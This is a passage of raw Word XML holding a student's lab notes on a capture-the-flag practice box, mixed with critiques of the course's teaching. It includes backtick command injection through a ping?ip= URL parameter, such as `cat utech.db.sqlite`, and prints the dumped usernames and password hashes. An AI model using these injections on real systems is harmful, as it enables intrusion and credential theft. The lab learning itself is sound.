      <w:r w:rsidRPr="007A67A4">
        <w:t>document.querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>('form')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9C351" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>form.action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> = `http://${getAPIURL()}/auth`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26EC9E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79503C57" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:t>})();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1627D8BC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5A913885" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="6FA37DB5" w14:textId="77B16D46" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>-- / end of captured code --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC82C55" w14:textId="719F5355" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r>
        <w:t>I c</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t>an’t make any sense of it…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059957E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Further files in .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>css.min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> have annotations, but nothing that seems related to file uploads or anything juicy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9217D" w14:textId="7ABA06C0" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>No quickly-visible info disclosure…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09765EDA" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="1D218BA4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Block end — (1hr elapsed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF6E021" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Avoid rabbit-hole behavior of reading code, prioritize assessing other “juicy” targets like burp interception… delayed due to lack of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>familiartity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C012BC0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Following walkthrough for enumeration follow-up. Nothing more I can find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F855D1" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5901106F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">&lt;from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>walktrhough</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>&gt; Ultratech@yopmail.com found on the contact us now link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0668A" w14:textId="5A9E83C9" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66470A99" wp14:editId="5F7DDDFC">
            <wp:extent cx="4649571" cy="2505075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14851697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6401" cy="2508755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA8B67" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="3C52F55D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">*Error found in walkthrough: mentor fails to explain the settings used for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>burpsuite’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> passive crawl that he uses for enumeration. Not documented and therefore cannot be replicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559BCFDE" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">*However, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> is not even needed, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> is more comprehensive than the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> crawl. (Later, I found out that identifying the api.js file was the path forward, so I uncovered it with the enumeration, but I couldn’t identify the code within it that was exploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558264BE" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">*Course error - finding exploitable code has not been adequately covered in examples up to this point. Showing how to identify vulnerable code in an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>? This is the first example of that. Requires structured practice BEFORE putting it in a box-challenge, so the mentor is lacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065FB8D9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="21431EEC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>&lt;continuing with walkthrough&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2705FF28" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="2C1A5695" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>From robots.txt l—&gt; utech_sitemap.txt mentioned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09785CB0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Sitemap shows the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69887525" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330308E6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16792E15" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/what.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E99CE4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>/partners.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34B8AF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="139DF3F5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>This partners.html is a login portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4C470" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="2510CCA3" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The source code references back to that weird api.js that I found before… the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> is referenced by the login portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10875BCA" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="33D90E4E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Wait… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29068979" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>`http://${getAPIURL()}/ping?ip=${window.location.hostname}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4B734" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Is important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D853456" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>‘http://10.10.61.189:8081/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ping?ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>=10.10.25.198’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A359732" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">The mentor explains this pings back my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>atk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> machine to test if this means we can run cli-like commands through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F6055F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>(Unfortunately, this is the first time we’ve practiced breaking down such code, so it’s unreasonable to expect a student to “get” this, much less to recognize its significance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D38EDCC" w14:textId="627F9651" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E6E7808" wp14:editId="18AE4DB1">
            <wp:extent cx="6334125" cy="1571625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="12570592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7971" cy="1572579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C076E3E" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="441D3723" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Only ping command works, so I can’t pipe or do other tricky syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD901DF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>However, ` backticks will take priority over other commands, so if I try doing something in backticks it should work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33299EC8" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">*(This fact has never been mentioned in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> esc course so far, so it violates the principle of only testing what you teach. Revise the learning material to introduce this principle BEFORE this box. Yet again, this challenge is presented without adequate preparation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD1F2B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">If this is meant as a demo to </w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>introduce</w:t>
      </w:r>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> ideas, then it’s illogical to expect a student to perform the steps that have not been demonstrated. Yet again, mentor’s methodology needs revision…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18619D86" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="73E4DC8B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">URL injection of a command, exploiting this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDA98C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="118E2CD0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ip.target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>&gt;:8081/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ping?ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>=`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ls`</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1659EFF2" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>(using backticks to encapsulate the command ^)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1356DC3A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explanation unclear, but it appears the [ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ping?ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>= ] portion must be run because of the API code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B5139" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="1277BB5F" w14:textId="2669BD2E" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EFFACAF" wp14:editId="7CD588E8">
            <wp:extent cx="6995410" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1226631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02616" cy="1668592"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="165BDFD1" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5DA60028" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Compare, from the API discovered in the JS files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4460F751" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> = `http://${getAPIURL()}/ping?ip=${window.location.hostname}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCB0C5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>We’re replacing ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>window.location.hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>} with our backtick command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716674F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>—&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71861132" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.10.61.189:8081/ping?ip=`cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>utech.db.sqlite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4EA0A7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">This will let us read the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> database we’ve uncovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4675F950" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>*(Mentor’s materials need to be updated to demonstrate this comparison, as the limitations for where the command injection is occurring and why it’s specifically behind the [=] are not made clear. In his walk-through, he fails to show the API code as stated above, at least not in proximity to the injection code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA5951" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="57713770" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Results of catting out the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>sqlite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D68BAAD" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="25CE4369" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> \ufffd\ufffd\ufffd(Mr00tf357a0c52799563c7c7b76c1e7543a32)Madmin0d0ea5111e3c1def594c1684e3b9be84: Parameter string not correctly encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCCE56" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">*(Mentor never mentioned that using [cat] on a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> database is a valid way to read it. Only been used on text files before. This needs to be introduced before asking someone to perform a command they didn’t know was valid, constituting another gap in teaching methods)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2184A61D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E57D86" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Cleaning up the cat output:</w:t>
      </w:r>
    </w:p>
